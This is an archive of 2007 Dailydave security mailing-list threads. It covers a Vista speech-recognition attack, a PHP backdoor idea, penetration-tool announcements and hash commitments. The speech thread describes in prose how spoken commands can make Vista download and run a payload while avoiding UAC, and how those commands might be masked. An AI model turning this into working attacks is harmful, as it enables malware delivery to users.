From krahmer at suse.de Thu Feb 1 04:30:28 2007 From: krahmer at suse.de (Sebastian Krahmer) Date: Thu, 1 Feb 2007 10:30:28 +0100 (CET) Subject: [Dailydave] On "Application Level Rootkits" In-Reply-To: References: Message-ID: On Wed, 31 Jan 2007, LMH wrote: I just wrote down some thoughts about curious backdoors a few days ago: http://c-skills.blogspot.com/2007/01/good-side-of-spam.html The syslog backdoor existst, is straight forward but I dont know how to proper do the tabs within the blog :) Sebastian > I'm curious if someone else has ever done work around a PHP extension > backdoor. I've been checking code around and it seems to be a nice > possibility. > > Drop the extension and have the target host send a blue haired Goatse > image when a specific token is passed via the query string to any PHP > script. Or something else more fruitful. > > -- Lance. > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -- ~ ~ perl self.pl ~ $_='print"\$_=\47$_\47;eval"';eval ~ krahmer at suse.de - SuSE Security Team ~ From george_ou at lanarchitect.net Thu Feb 1 05:04:58 2007 From: george_ou at lanarchitect.net (George Ou) Date: Thu, 1 Feb 2007 02:04:58 -0800 Subject: [Dailydave] Vista speach recognition In-Reply-To: References: <000d01c744b5$83fa5960$0c01a8c0@ecs400a> <42EE8AEE-345B-4D67-8BD2-2E70774A0AA2@securosis.com> <000601c744d4$834b1580$0c01a8c0@ecs400a> <000101c74518$b1891070$0c01a8c0@ecs400a> <000001c7451b$ac4c3ee0$0c01a8c0@ecs400a> <000901c7456e$355f36e0$0c01a8c0@ecs400a> Message-ID: <000001c745e8$6eb31db0$0c01a8c0@ecs400a> Rich verified it will work and you can execute code. So long as you stay in the user-realm, you won't trigger UAC which cannot be bypassed "by default" as Microsoft says. -----Original Message----- From: Sebastian Krahmer [mailto:krahmer at suse.de] Sent: Thursday, February 01, 2007 1:32 AM To: George Ou Cc: dailydave at lists.immunitysec.com; 'Rich Mogull' Subject: RE: [Dailydave] Vista speach recognition On Wed, 31 Jan 2007, George Ou wrote: So we do not know yet whether dl'ing and executing user-level binaries works? Or does it not work (according to previous mail)? Sebastian > Doh! Maybe it was the right assumption that UAC isn't triggered on > user-level executables. I need to verify but need to wait till I > rebuild my Vista system. If anyone can verify this why my Vista > system is being repaired, much appreciated. > > -----Original Message----- > From: George Ou [mailto:george_ou at lanarchitect.net] > Sent: Wednesday, January 31, 2007 11:26 AM > To: 'Sebastian Krahmer'; 'dailydave at lists.immunitysec.com'; 'Rich Mogull' > Subject: RE: [Dailydave] Vista speach recognition > > Ah I made a wrong assumption. Any executable you launch regardless of > whether it attempts to access system files or not will trigger UAC. > > The file deletion concept still works though. > > George > > -----Original Message----- > From: George Ou [mailto:george_ou at lanarchitect.net] > Sent: Wednesday, January 31, 2007 3:09 AM > To: 'Sebastian Krahmer'; 'dailydave at lists.immunitysec.com'; 'Rich Mogull' > Subject: RE: [Dailydave] Vista speach recognition > > I just verified that TinyURL.com will give you a nice URL to an executable. > > Here's an example of a URL that opens a .EXE file. > http://tinyurl.com/3d588b > > Now imagine that this was actually a user-mode malicious payload that > avoids triggering UAC which contains ransomware. It's very easy to > use Vista speech command open IE7 and say "tinyURL.com/3d588b", > "enter", "run". That will actually download and launch your desired > payload from any website and TinyURL will make it easy to say. This > is actually easier than my successful document-deleting recycle bin > emptying test because it's a shorter script. > > > > George > -- ~ ~ perl self.pl ~ $_='print"\$_=\47$_\47;eval"';eval ~ krahmer at suse.de - SuSE Security Team ~ From krahmer at suse.de Thu Feb 1 05:09:38 2007 From: krahmer at suse.de (Sebastian Krahmer) Date: Thu, 1 Feb 2007 11:09:38 +0100 (CET) Subject: [Dailydave] Vista speach recognition In-Reply-To: <000001c745e8$6eb31db0$0c01a8c0@ecs400a> References: <000d01c744b5$83fa5960$0c01a8c0@ecs400a> <42EE8AEE-345B-4D67-8BD2-2E70774A0AA2@securosis.com> <000601c744d4$834b1580$0c01a8c0@ecs400a> <000101c74518$b1891070$0c01a8c0@ecs400a> <000001c7451b$ac4c3ee0$0c01a8c0@ecs400a> <000901c7456e$355f36e0$0c01a8c0@ecs400a> <000001c745e8$6eb31db0$0c01a8c0@ecs400a> Message-ID: On Thu, 1 Feb 2007, George Ou wrote: BTW, is there a specification which actions by a binary will trigger UAC? opening sockets? executing command shell? UAC might be bypassed as well, remember all the kernel level exploits for Linux, there might be similar ones for Win. Sebastian > Rich verified it will work and you can execute code. So long as you stay in > the user-realm, you won't trigger UAC which cannot be bypassed "by default" > as Microsoft says. > > -----Original Message----- > From: Sebastian Krahmer [mailto:krahmer at suse.de] > Sent: Thursday, February 01, 2007 1:32 AM > To: George Ou > Cc: dailydave at lists.immunitysec.com; 'Rich Mogull' > Subject: RE: [Dailydave] Vista speach recognition > > On Wed, 31 Jan 2007, George Ou wrote: > > So we do not know yet whether dl'ing and executing user-level binaries > works? Or does it not work (according to previous mail)? > > Sebastian > > > Doh! Maybe it was the right assumption that UAC isn't triggered on > > user-level executables. I need to verify but need to wait till I > > rebuild my Vista system. If anyone can verify this why my Vista > > system is being repaired, much appreciated. > > > > -----Original Message----- > > From: George Ou [mailto:george_ou at lanarchitect.net] > > Sent: Wednesday, January 31, 2007 11:26 AM > > To: 'Sebastian Krahmer'; 'dailydave at lists.immunitysec.com'; 'Rich Mogull' > > Subject: RE: [Dailydave] Vista speach recognition > > > > Ah I made a wrong assumption. Any executable you launch regardless of > > whether it attempts to access system files or not will trigger UAC. > > > > The file deletion concept still works though. > > > > George > > > > -----Original Message----- > > From: George Ou [mailto:george_ou at lanarchitect.net] > > Sent: Wednesday, January 31, 2007 3:09 AM > > To: 'Sebastian Krahmer'; 'dailydave at lists.immunitysec.com'; 'Rich Mogull' > > Subject: RE: [Dailydave] Vista speach recognition > > > > I just verified that TinyURL.com will give you a nice URL to an > executable. > > > > Here's an example of a URL that opens a .EXE file. > > http://tinyurl.com/3d588b > > > > Now imagine that this was actually a user-mode malicious payload that > > avoids triggering UAC which contains ransomware. It's very easy to > > use Vista speech command open IE7 and say "tinyURL.com/3d588b", > > "enter", "run". That will actually download and launch your desired > > payload from any website and TinyURL will make it easy to say. This > > is actually easier than my successful document-deleting recycle bin > > emptying test because it's a shorter script. > > > > > > > > George > > > > -- > ~ > ~ perl self.pl > ~ $_='print"\$_=\47$_\47;eval"';eval > ~ krahmer at suse.de - SuSE Security Team > ~ > > -- ~ ~ perl self.pl ~ $_='print"\$_=\47$_\47;eval"';eval ~ krahmer at suse.de - SuSE Security Team ~ From juha-matti.laurio at netti.fi Thu Feb 1 11:29:21 2007 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Date: Thu, 1 Feb 2007 18:29:21 +0200 (EET) Subject: [Dailydave] Vista speach recognition Message-ID: <6903992.430651170347361960.JavaMail.juha-matti.laurio@netti.fi> Microsoft has released its response at MSRC Blog now. Link: http://blogs.technet.com/msrc/archive/2007/01/31/issue-regarding-windows-vista-speech-recognition.aspx - Juha-Matti From lcamtuf at dione.ids.pl Thu Feb 1 13:43:04 2007 From: lcamtuf at dione.ids.pl (Michal Zalewski) Date: Thu, 1 Feb 2007 19:43:04 +0100 (CET) Subject: [Dailydave] Vista speach recognition In-Reply-To: <6903992.430651170347361960.JavaMail.juha-matti.laurio@netti.fi> References: <6903992.430651170347361960.JavaMail.juha-matti.laurio@netti.fi> Message-ID: On Thu, 1 Feb 2007, Juha-Matti Laurio wrote: > http://blogs.technet.com/msrc/archive/2007/01/31/issue-regarding-windows-vista-speech-recognition.aspx I find this kind of bogus. Voice recognition systems don't compare raw waveforms. Most of the information is discarded: they usually isolate a fraction of the signal, normalize it, chop it into discrete bits that best reflect changes in voice modulation or whatnot, then feed it to HMM analyzer or some other ANN. This is heavily optimized based on various assumptions on how human speech sounds, and how ambient noises might look like. What this means is that it is in all likelihood possible to produce a waveform that will be impossible to interpret for a human (either because it is masked by a superimposed signal, or because it does not resemble speech in the first place), but will be "heard" as meaningful words by Vista. So, you get an eerie industrial background music and noises on a website, instead of a dude reading out loud "my documents, delete, yes". Heck, this happens spontaneously: speech recognition systems sometimes pick up random burps and crashes from the environment and map them to dictionary words. And wasn't there an early demo for Vista speech recognition that wasn't trained for that particular salesdude, and kept hearing "dear aunt double the killer" instead of what he was saying? Oh yeah: http://video.google.com/videoplay?docid=-1123221217782777472 Now, I bet that MSRC dudes are well aware of this possibility, but chose not to mention it. Eh. /mz From ken.buchanan at gmail.com Thu Feb 1 14:07:54 2007 From: ken.buchanan at gmail.com (Ken Buchanan) Date: Thu, 1 Feb 2007 14:07:54 -0500 Subject: [Dailydave] Vista speach recognition In-Reply-To: <6903992.430651170347361960.JavaMail.juha-matti.laurio@netti.fi> References: <6903992.430651170347361960.JavaMail.juha-matti.laurio@netti.fi> Message-ID: <378dde5d0702011107l1d63f944q9d1f6cd44263a20c@mail.gmail.com> >From MS: "Of course this would be heard and the actions taken would be visible to the user if they were in front of the PC during the attempted exploitation." Bah. I bet some degree of stealth could be worked into this if someone tried hard enough. The most obvious method won't work: emitting sound outside the range of human hearing. The intersection of the sets of frequencies that a normal microphone will detect, a normal speaker will emit, and human ears won't detect is null. There are other avenues that would have to be explored experimentally. How much can you speed up or slow down the words and the recognition still work? What about overlaying the commands on music? Can we take advantage of psychoacoustics to disguise some of the phonemes, so an unalert user might not notice their presence? I just wouldn't assume this is inherently non-stealthy. - Ken On 2/1/07, Juha-Matti Laurio wrote: > Microsoft has released its response at MSRC Blog now. > > Link: > http://blogs.technet.com/msrc/archive/2007/01/31/issue-regarding-windows-vista-speech-recognition.aspx > > - Juha-Matti > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > From dave at immunityinc.com Thu Feb 1 15:26:16 2007 From: dave at immunityinc.com (Dave Aitel) Date: Thu, 01 Feb 2007 15:26:16 -0500 Subject: [Dailydave] IPv6, CANVAS, The Love. Message-ID: <45C24CE8.10401@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 As of today, Immunity CANVAS is now the only penetration testing platform that can handle IPv6. You know you're excited! What about all those IPv6 DoD networks you can test now? A Flash movie of CANVAS targeting a Windows 2003 SP0 machine via IPv6 from a Windows XP machine. Our very own Bas Alberts owns the Windows 2003 server, then runs a "dir" command, gets a screenshot, and celebrates in true Immunity style. http://www.immunityinc.com/documentation/ipv6.html A screenshot of CANVAS 6.19 attacking over IPv6 from Linux. http://www.immunityinc.com/images/ipv6.png Vista, of course, includes IPv6 by default. Vista Ultimate is now my recommended platform for Windows people running exploits thanks to a non-handicapped TCP/IP stack (and the almost as pretty as Beryl user interface!). Bonus: The VisualSploit screenshot I promised while in Singapore. Truly a fun bug to exploit with VisualSploit. It's just that easy! http://www.immunityinc.com/images/VS_Screenshot.png - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFwkzmB8JNm+PA+iURAlcJAJ9BV+6HVs7Ze6+xiSwurEG6BzXUAwCg5k/S aYpZYtsrLjxLw5Nx720kg9A= =vmom -----END PGP SIGNATURE----- From dentonj at gmail.com Thu Feb 1 19:12:21 2007 From: dentonj at gmail.com (Jeffrey Denton) Date: Fri, 2 Feb 2007 01:12:21 +0100 Subject: [Dailydave] IPv6, CANVAS, The Love. In-Reply-To: <45C24CE8.10401@immunityinc.com> References: <45C24CE8.10401@immunityinc.com> Message-ID: <8ebbd7f50702011612v32ac2abkf6d1ea818347cf4@mail.gmail.com> On 2/1/07, Dave Aitel wrote: > As of today, Immunity CANVAS is now the only penetration testing > platform that can handle IPv6. You know you're excited! What about all > those IPv6 DoD networks you can test now? Does CANVAS have any IPv6 specific attacks? Even something as lame as a DOS againt Duplicate Address Detection? Victim: Anyone using this address? (Neighbor Solicitation) CANVAS: Yeap! (Neighbor Advertisement) Victim: How about this one? CANVAS: Got it. Victim: And this one? CANVAS: Try again. From robert_david_graham at yahoo.com Thu Feb 1 21:44:12 2007 From: robert_david_graham at yahoo.com (Robert Graham) Date: Thu, 1 Feb 2007 18:44:12 -0800 (PST) Subject: [Dailydave] IPv6, CANVAS, The Love. In-Reply-To: <45C24CE8.10401@immunityinc.com> Message-ID: <20070202024412.9588.qmail@web51006.mail.yahoo.com> --- Dave Aitel wrote: > A Flash movie of CANVAS targeting a Windows 2003 SP0 machine via IPv6 > from a Windows XP machine. Our very own Bas Alberts owns the Windows > 2003 server, then runs a "dir" command, gets a screenshot, and > celebrates in true Immunity style. Packet-caps or it didn't happen. :-) ____________________________________________________________________________________ Don't get soaked. Take a quick peak at the forecast with the Yahoo! Search weather shortcut. http://tools.search.yahoo.com/shortcuts/#loc_weather From george_ou at lanarchitect.net Fri Feb 2 04:04:14 2007 From: george_ou at lanarchitect.net (George Ou) Date: Fri, 2 Feb 2007 01:04:14 -0800 Subject: [Dailydave] Vista speach recognition References: <000d01c744b5$83fa5960$0c01a8c0@ecs400a> <42EE8AEE-345B-4D67-8BD2-2E70774A0AA2@securosis.com> <000601c744d4$834b1580$0c01a8c0@ecs400a> <000101c74518$b1891070$0c01a8c0@ecs400a> <000001c7451b$ac4c3ee0$0c01a8c0@ecs400a> <000901c7456e$355f36e0$0c01a8c0@ecs400a> Message-ID: <000501c746a9$1d31aa80$0c01a8c0@ecs400a> Here's the round up on news coverage on this flaw. http://blogs.techrepublic.com.com/Ou/?p=420 http://blogs.zdnet.com/Ou/?p=420 "The fundamental problem here is that Microsoft "extended" speech to be able to control the Operating System and Applications without considering the full security implications. If Microsoft had merely assigned a user-defined password with an automatic lockout after a certain amount of idle time, it would have made the generic attack impossible but they failed do that. So I'm asking Microsoft to reconsider their stance that "there is little if any need to worry" and implement some sort of safety mechanism rather than relying on the user to be self vigilant. It doesn't matter that there aren't that many people using this feature; Microsoft should fix it if they're going to offer it and market it as a key Vista advantage. Since Microsoft is promoting Voice recognition for healthcare, we should consider the safety of patient health records. At present time, Vista Speech Recognition wakes up to the command "start listening". How hard would it be for Microsoft to make that a user-definable phrase or word? For example: A user would pick "Zelda" as the word to wake speech mode while someone else picks "439" as their wake word. How hard would it be for Microsoft to implement a wake timeout so that Speech Recognition would sleep after 5 minutes idle? How hard would it be for Microsoft to implement their excellent echo cancellation algorithm in Windows Messenger for Speech Recognition? I don't believe this is too much to ask." I want to thank the SANS Institute guys for "getting it". Coming from them, that means something to me. I'm also running a poll at the end asking if Microsoft should patch this with a pass phrase and echo cancellation. George Ou From krahmer at suse.de Fri Feb 2 04:48:29 2007 From: krahmer at suse.de (Sebastian Krahmer) Date: Fri, 2 Feb 2007 10:48:29 +0100 (CET) Subject: [Dailydave] Vista speach recognition In-Reply-To: <000501c746a9$1d31aa80$0c01a8c0@ecs400a> References: <000d01c744b5$83fa5960$0c01a8c0@ecs400a> <42EE8AEE-345B-4D67-8BD2-2E70774A0AA2@securosis.com> <000601c744d4$834b1580$0c01a8c0@ecs400a> <000101c74518$b1891070$0c01a8c0@ecs400a> <000001c7451b$ac4c3ee0$0c01a8c0@ecs400a> <000901c7456e$355f36e0$0c01a8c0@ecs400a> <000501c746a9$1d31aa80$0c01a8c0@ecs400a> Message-ID: On Fri, 2 Feb 2007, George Ou wrote: Hi, I think its a quite normal reflex to decrease importance of such bugs. If its an IE7 instand high-tech remote, you have little chance to say 'not so important'. if it has some sort of fun-factor and some laughs, its easier to say 'yes, but not serious'. At least until you realize that all your firewalls, IDS and whatnot did not protect you. On the other hand, I do not really care what the "official" severity is. Maybe, in 20 years, if all computers are controlled by expressions, speech and gestures such "exploits" become common; and this one was the first of this kind. Lets see how it developes ;-) thanks for the effort, Sebastian > Here's the round up on news coverage on this flaw. > http://blogs.techrepublic.com.com/Ou/?p=420 > http://blogs.zdnet.com/Ou/?p=420 > > "The fundamental problem here is that Microsoft "extended" speech to be able > to control the Operating System and Applications without considering the > full security implications. If Microsoft had merely assigned a user-defined > password with an automatic lockout after a certain amount of idle time, it > would have made the generic attack impossible but they failed do that. So > I'm asking Microsoft to reconsider their stance that "there is little if any > need to worry" and implement some sort of safety mechanism rather than > relying on the user to be self vigilant. It doesn't matter that there > aren't that many people using this feature; Microsoft should fix it if > they're going to offer it and market it as a key Vista advantage. Since > Microsoft is promoting Voice recognition for healthcare, we should consider > the safety of patient health records. > > At present time, Vista Speech Recognition wakes up to the command "start > listening". How hard would it be for Microsoft to make that a > user-definable phrase or word? For example: A user would pick "Zelda" as > the word to wake speech mode while someone else picks "439" as their wake > word. How hard would it be for Microsoft to implement a wake timeout so > that Speech Recognition would sleep after 5 minutes idle? How hard would it > be for Microsoft to implement their excellent echo cancellation algorithm in > Windows Messenger for Speech Recognition? I don't believe this is too much > to ask." > > > I want to thank the SANS Institute guys for "getting it". Coming from them, > that means something to me. > > > I'm also running a poll at the end asking if Microsoft should patch this > with a pass phrase and echo cancellation. > > > > George Ou > -- ~ ~ perl self.pl ~ $_='print"\$_=\47$_\47;eval"';eval ~ krahmer at suse.de - SuSE Security Team ~ From dave.aitel at gmail.com Fri Feb 2 08:45:24 2007 From: dave.aitel at gmail.com (Dave Aitel) Date: Fri, 2 Feb 2007 08:45:24 -0500 Subject: [Dailydave] Vista speach recognition In-Reply-To: <000501c746a9$1d31aa80$0c01a8c0@ecs400a> References: <000601c744d4$834b1580$0c01a8c0@ecs400a> <000101c74518$b1891070$0c01a8c0@ecs400a> <000001c7451b$ac4c3ee0$0c01a8c0@ecs400a> <000901c7456e$355f36e0$0c01a8c0@ecs400a> <000501c746a9$1d31aa80$0c01a8c0@ecs400a> Message-ID: This thread is now dead. It's terrible publicity for Microsoft, since it's the exact thing they don't want to say. "Our uninspired OS has vulnerabilities the OS X people already fixed". Essentially it overrides the Microsoft marketing message since there's nothing tangible about Vista Ultimate to sell. "Search", "Voice", "Security" are the "three killer features", but as John Stewart said when he interviewed Bill Gates "Is this just about how we interact with computers or do they DO anything new?" People in America like to name things as the opposite of what they are. "The Patriot Act", "The War on Terror", "Vista Ultimate", "Digital Rights Management" etc. Vista isn't the last OS you're ever going to buy, so why name it like it is? That was a rhetorical question, for all the non-exploit-writing people out there who feel the need to say something on a mailing list to get their name in their own inbox. The point is the name makes it sound really cool, but anyone who's used it is like "eh?". It's better than XP, but Ubuntu is better than both of them, so whatever. Anyways, this is about as bad as it's going to get for Vista. Nobody is going to publicly announce vulnerabilities for it. Instead, they'll sell them and/or use them. Atlas shrugged a long time ago and the security industry is just now noticing. -dave On 2/2/07, George Ou wrote: > > Here's the round up on news coverage on this flaw. > http://blogs.techrepublic.com.com/Ou/?p=420 > http://blogs.zdnet.com/Ou/?p=420 > > "The fundamental problem here is that Microsoft "extended" speech to be > able > to control the Operating System and Applications without considering the > full security implications. If Microsoft had merely assigned a > user-defined > password with an automatic lockout after a certain amount of idle time, it > would have made the generic attack impossible but they failed do that. So > I'm asking Microsoft to reconsider their stance that "there is little if > any > need to worry" and implement some sort of safety mechanism rather than > relying on the user to be self vigilant. It doesn't matter that there > aren't that many people using this feature; Microsoft should fix it if > they're going to offer it and market it as a key Vista advantage. Since > Microsoft is promoting Voice recognition for healthcare, we should > consider > the safety of patient health records. > > At present time, Vista Speech Recognition wakes up to the command "start > listening". How hard would it be for Microsoft to make that a > user-definable phrase or word? For example: A user would pick "Zelda" as > the word to wake speech mode while someone else picks "439" as their wake > word. How hard would it be for Microsoft to implement a wake timeout so > that Speech Recognition would sleep after 5 minutes idle? How hard would > it > be for Microsoft to implement their excellent echo cancellation algorithm > in > Windows Messenger for Speech Recognition? I don't believe this is too > much > to ask." > > > I want to thank the SANS Institute guys for "getting it". Coming from > them, > that means something to me. > > > I'm also running a poll at the end asking if Microsoft should patch this > with a pass phrase and echo cancellation. > > > > George Ou > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070202/3498aeea/attachment.htm From ari.takanen at codenomicon.com Fri Feb 2 09:53:49 2007 From: ari.takanen at codenomicon.com (Ari Takanen) Date: Fri, 2 Feb 2007 16:53:49 +0200 Subject: [Dailydave] IPv6, CANVAS, The Love. In-Reply-To: References: Message-ID: <20070202145349.GB11744@codenomicon.com> Hello all, On Fri, Feb 02, 2007 at 07:44:33AM -0500, dailydave-request at lists.immunitysec.com wrote: > As of today, Immunity CANVAS is now the only penetration testing > platform that can handle IPv6. You know you're excited! What about all > those IPv6 DoD networks you can test now? I do not usually want to promote our tools (too much) but wanted to respond to the advertisement by Immunity. Codenomicon has probably been the first to cover every single protocol (100+ interfaces supported), and IPv6 is not an exception (well PROTOS did some of the protocols before us, but that does not count because we kind of are the same thing as the PROTOS Classic test suites [1]). Codenomicon has done security testing of IPv6 for a long time already. Also most if not all Codenomicon tools are IPv6 capable. Infact we (or our customers to be more exact) can find zero-day flaws from almost any IPv6 device. [1] http://www.codenomicon.com/media/press-releases/2007-01-09.shtml /Ari -- -o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o- Ari Takanen Codenomicon Ltd. ari.takanen at codenomicon.com Tutkijantie 4E tel: +358-40 50 67678 FIN-90570 Oulu http://www.codenomicon.com Finland PGP: http://www.codenomicon.com/codenomicon-key.asc -o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o- From dave at immunityinc.com Fri Feb 2 11:41:08 2007 From: dave at immunityinc.com (Dave Aitel) Date: Fri, 02 Feb 2007 11:41:08 -0500 Subject: [Dailydave] IPv6, CANVAS, The Love. In-Reply-To: <20070202145349.GB11744@codenomicon.com> References: <20070202145349.GB11744@codenomicon.com> Message-ID: <45C369A4.1070109@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I'm a big fan of fuzzers, but fuzzers and attack frameworks are two different things. I'm sure Codenomicon/PROTOS, MU, Breakingpoint, ProtoVer, SPIKE2K6 and various other fuzzers all support IPv6 or protocols that run over IPv6, but once they find a vulnerability, you would then plug that into CANVAS or another attack framework to target someone's machine. So two sides of the same coin, as it were. Apples and Orangutans. NP Complete and O(1). And so on. I'm sure you're just feigning confusion here, but I wanted to make sure you didn't induce real confusion in anyone reading this list. . .which is unlikely except after yesterday's press coverage there's 1000 new people subscribed who might be CNN-type readers. They'll all unsubscribe when they realize this list is mostly about breaking into computers the hard way - where EIP is involved. Being first is silly anyways. Everyone's first at something. The Zune is the top seller in the category of 30gig mp3 players that are also brown, but it sold like 5 units and the Microsoft guy in charge of that marketing had to leave for "personal reasons". There's no one best fuzzer; that's the beauty of the beast. - -dave Ari Takanen wrote: > Hello all, > > On Fri, Feb 02, 2007 at 07:44:33AM -0500, dailydave-request at lists.immunitysec.com wrote: >> As of today, Immunity CANVAS is now the only penetration testing >> platform that can handle IPv6. You know you're excited! What about all >> those IPv6 DoD networks you can test now? > > I do not usually want to promote our tools (too much) but wanted to > respond to the advertisement by Immunity. > > Codenomicon has probably been the first to cover every single protocol > (100+ interfaces supported), and IPv6 is not an exception (well PROTOS > did some of the protocols before us, but that does not count because > we kind of are the same thing as the PROTOS Classic test suites > [1]). Codenomicon has done security testing of IPv6 for a long time > already. Also most if not all Codenomicon tools are IPv6 > capable. Infact we (or our customers to be more exact) can find > zero-day flaws from almost any IPv6 device. > > [1] http://www.codenomicon.com/media/press-releases/2007-01-09.shtml > > /Ari > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFw2miB8JNm+PA+iURAovFAKDUqSdKYeXgYOmwHVN5Uo/DVISlXgCeLtaC F2N1W9klTGe+m5Xe5P2k83k= =UOv8 -----END PGP SIGNATURE----- From dave.aitel at gmail.com Sun Feb 4 14:32:32 2007 From: dave.aitel at gmail.com (Dave Aitel) Date: Sun, 4 Feb 2007 14:32:32 -0500 Subject: [Dailydave] Superbowl sunday Message-ID: View into Miami - outlook foggy, like Vista's ASLR implementation. http://picasaweb.google.com/dave.aitel/Superbowl/photo#5027752094863004162 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070204/ccaf2b64/attachment.htm From HalVar at gmx.de Mon Feb 5 08:11:30 2007 From: HalVar at gmx.de (Halvar Flake) Date: Mon, 05 Feb 2007 14:11:30 +0100 Subject: [Dailydave] Some Sums In-Reply-To: References: Message-ID: <20070205131130.292040@gmx.net> Hey all, for lack of a better place, I would like to post the following hash values: MD5Sum: 5e5ed3b92b2abbcc1adaa18cc0ca6aaf SHA1sum: FFECBE21E3EC93A5AC2B94889AD2967881398A9C Cheers, Halvar -- "Feel free" - 10 GB Mailbox, 100 FreeSMS/Monat ... Jetzt GMX TopMail testen: http://www.gmx.net/de/go/topmail?ac=OM.GX.GX003K11713T4783a From dave.korn at artimi.com Mon Feb 5 09:37:42 2007 From: dave.korn at artimi.com (Dave Korn) Date: Mon, 5 Feb 2007 14:37:42 -0000 Subject: [Dailydave] Some Sums In-Reply-To: <20070205131130.292040@gmx.net> References: <20070205131130.292040@gmx.net> Message-ID: <028e01c74933$32a6a410$2e08a8c0@CAM.ARTIMI.COM> On 05 February 2007 13:12, Halvar Flake wrote: > Hey all, > > for lack of a better place, I would like to post the following hash values: > > MD5Sum: > 5e5ed3b92b2abbcc1adaa18cc0ca6aaf > > SHA1sum: > FFECBE21E3EC93A5AC2B94889AD2967881398A9C > > Cheers, > Halvar I take it that's going to be the hash of some file or other data you're going to produce for someone at sometime in the future? Couldn't you just have used a ZK protocol and left us all out of it? ;-) If you're going to use our inboxes as substitutes for escrow/notarisation centres, you could perhaps tell us just a little bit more about what you're doing! cheers, DaveK -- Can't think of a witty .sigline today.... From HalVar at gmx.de Mon Feb 5 10:22:44 2007 From: HalVar at gmx.de (Halvar Flake) Date: Mon, 05 Feb 2007 16:22:44 +0100 Subject: [Dailydave] Some Sums In-Reply-To: <028e01c74933$32a6a410$2e08a8c0@CAM.ARTIMI.COM> References: <20070205131130.292040@gmx.net> <028e01c74933$32a6a410$2e08a8c0@CAM.ARTIMI.COM> Message-ID: <20070205152244.239350@gmx.net> Hey all, apologies for having taken up space in your inboxes. There will be a followup to this mail once I can confirm that the stuff I have hashed is not bogus - with the original file. This might take a few months though - if it was easily confirmed, I would have posted results instead of hashes. Concerning using your inboxes: Dailydave is a pretty important list, and as such, people on this list are likely competent and trustworthy - who would be better suited for notarisation of vulnerability information than this list here ? And where would one find a similarly large group of professionals that could act as witness ? I admit that strictly speaking I have abused DD with the last mail. What about a general, publically archived mailing list where people can post hashes of results to follow up later ? Anyone who has read the matasano blog recently (Ptacek/Rutkowska debate) would tend to agree that we need something like this. If people actually follow up with the originals of their hashes a few months (or a year) later, such a list might be hugely interesting. Even if they just follow up with "the contents of the document with xxx are flawed, and I withdraw the hash". Anybody up for setting up such a list ? Anyhow, apologies for wasting your disk space - I will look for a better forum in the future. Full-disclosure maybe ? It seems to be a widely-archived write-only-medium anyhow. Cheers, Halvar -- Der GMX SmartSurfer hilft bis zu 70% Ihrer Onlinekosten zu sparen! Ideal f?r Modem und ISDN: http://www.gmx.net/de/go/smartsurfer From peter at ngssoftware.com Mon Feb 5 11:06:46 2007 From: peter at ngssoftware.com (Peter Winter-Smith) Date: Mon, 5 Feb 2007 08:06:46 -0800 Subject: [Dailydave] Some Sums References: <20070205131130.292040@gmx.net> <028e01c74933$32a6a410$2e08a8c0@CAM.ARTIMI.COM> Message-ID: <00bb01c7493f$a71de4f0$dededede@peterdell> I put forward the theory that Halvar dreamt up those hashes and is now on a desparate hunt to find the data behind the hash - the hash is the answer, what was the question :-D -Peter ----- Original Message ----- From: "Dave Korn" To: "'Halvar Flake'" ; "'Dave Aitel'" ; Sent: Monday, February 05, 2007 6:37 AM Subject: Re: [Dailydave] Some Sums > On 05 February 2007 13:12, Halvar Flake wrote: > >> Hey all, >> >> for lack of a better place, I would like to post the following hash >> values: >> >> MD5Sum: >> 5e5ed3b92b2abbcc1adaa18cc0ca6aaf >> >> SHA1sum: >> FFECBE21E3EC93A5AC2B94889AD2967881398A9C >> >> Cheers, >> Halvar > > > I take it that's going to be the hash of some file or other data you're > going to produce for someone at sometime in the future? Couldn't you just > have used a ZK protocol and left us all out of it? ;-) If you're going to > use > our inboxes as substitutes for escrow/notarisation centres, you could > perhaps > tell us just a little bit more about what you're doing! > > > cheers, > DaveK > -- > Can't think of a witty .sigline today.... > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 From dave.korn at artimi.com Mon Feb 5 10:39:52 2007 From: dave.korn at artimi.com (Dave Korn) Date: Mon, 5 Feb 2007 15:39:52 -0000 Subject: [Dailydave] Some Sums In-Reply-To: <20070205152244.239350@gmx.net> References: <20070205131130.292040@gmx.net> <028e01c74933$32a6a410$2e08a8c0@CAM.ARTIMI.COM> <20070205152244.239350@gmx.net> Message-ID: <029a01c7493b$e0be8970$2e08a8c0@CAM.ARTIMI.COM> On 05 February 2007 15:23, Halvar Flake wrote: > Hey all, > > apologies for having taken up space in your inboxes. Heh, NM.... I wasn't really upset, I just wanted to prod you to give out some clue :) > And where would one > find a similarly large group of professionals that could act as witness ? Normally I just go round 